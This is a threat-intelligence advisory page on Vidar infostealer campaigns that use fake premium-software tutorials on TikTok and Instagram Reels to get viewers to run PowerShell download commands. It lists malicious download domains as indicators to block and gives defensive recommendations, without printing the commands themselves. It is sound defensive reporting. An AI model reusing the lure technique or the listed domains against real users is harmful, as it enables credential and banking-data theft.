Back

Scammers Use Social Media to Distribute Vidar Infostealer via Fake Tutorials

Severity: High (Score: 67.5)

Sources: Infosecurity-Magazine, Scworld

Published: 2026-06-11 · Updated: 2026-06-11

Keywords: vidar, infostealer, tiktok, scammers, short, videos, spread

Severity indicators: stealer, infostealer

Summary

Threat actors are exploiting TikTok and Instagram Reels to distribute the Vidar infostealer, masquerading as software tutorials for free premium applications like Spotify. ReversingLabs reported two campaigns that utilize misleading branding and social engineering tactics to attract viewers. One campaign featured a video with over 100,000 views, directing users to execute commands that download the malware. The infostealer, sold as a service for $300, collects sensitive information such as passwords and banking data. The videos leverage platform algorithms favoring saved content, making detection challenging. Users are advised to avoid executing untrusted commands, and organizations should enhance training to recognize these threats. Reporting suspicious content is crucial to mitigate the impact of these scams. Key Points: • Scammers exploit TikTok and Instagram to distribute the Vidar infostealer. • Fake software tutorials lure users into executing malicious commands. • One video reached over 100,000 views, showcasing the effectiveness of the campaigns.

Detailed Analysis

**Impact** Users of social media platforms TikTok and Instagram Reels are targeted globally through fake tutorials promising free access to premium software like Spotify Premium and Microsoft Word. The Vidar infostealer harvests credentials, financial data, and authentication tokens, risking significant personal and organizational data exposure. One video alone amassed over 100,000 views, indicating broad reach and potential for widespread compromise. No specific sectors or geographies beyond social media users were identified. **Technical Details** Attackers use short-form videos mimicking official branding to instruct users to execute PowerShell commands or engage with fake download sites gated by surveys. The PowerShell command downloads Vidar from lookalike domains such as msget[.]run and d4ug[.]site. Vidar is a malware-as-a-service infostealer that collects passwords, banking data, and browser cookies. The campaigns exploit social media algorithms favoring saves and shares to maximize distribution. No CVEs or zero-day exploits were reported. **Recommended Response** Audit and restrict software installation privileges within organizations immediately. Update phishing and social engineering training to include threats originating from social media platforms. Encourage employees to report suspicious social media content to increase takedown rates. Monitor for PowerShell command execution anomalies and block known malicious domains such as msget[.]run and d4ug[.]site.

Source articles (2)

  • Fake Software Tutorials on TikTok Spread Vidar Stealer — Infosecurity-Magazine · 2026-06-10
    Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer , disguising the attacks as tutorials for unlocking premium software for free. New analysis…
  • Scammers use short videos on social media to spread Vidar infostealer — Scworld · 2026-06-10
    Per HackRead, scammers are exploiting the popularity of short video formats on platforms like TikTok and Instagram Reels to distribute the Vidar infostealer malware, a departure from traditional phish…

Timeline

  • 2026-06-10 — ReversingLabs reports on Vidar infostealer campaigns: Two campaigns on TikTok and Instagram use fake tutorials to distribute Vidar, a malware that steals sensitive information.
  • 2026-06-10 — Scammers mimic official branding in videos: Scammers create videos with Windows-like icons to build trust and instruct users to run malicious commands.
  • Recent — Malware distributed via social media gains traction: Videos promoting free premium software have gained significant views, making detection and reporting difficult.

Related entities

  • Malware (Attack Type)
  • Phishing (Attack Type)
  • d4ug.site (Domain)
  • Vidar (Malware)
  • Vidar Infostealer (Malware)
  • T1059.001 - PowerShell (Mitre Attack)
  • T1059 - Command and Scripting Interpreter (Mitre Attack)
  • T1105 - Ingress Tool Transfer (Mitre Attack)
  • Instagram (Platform)
  • TikTok (Platform)
  • Windows (Platform)
  • Spotify (Company)
  • PowerShell (Tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed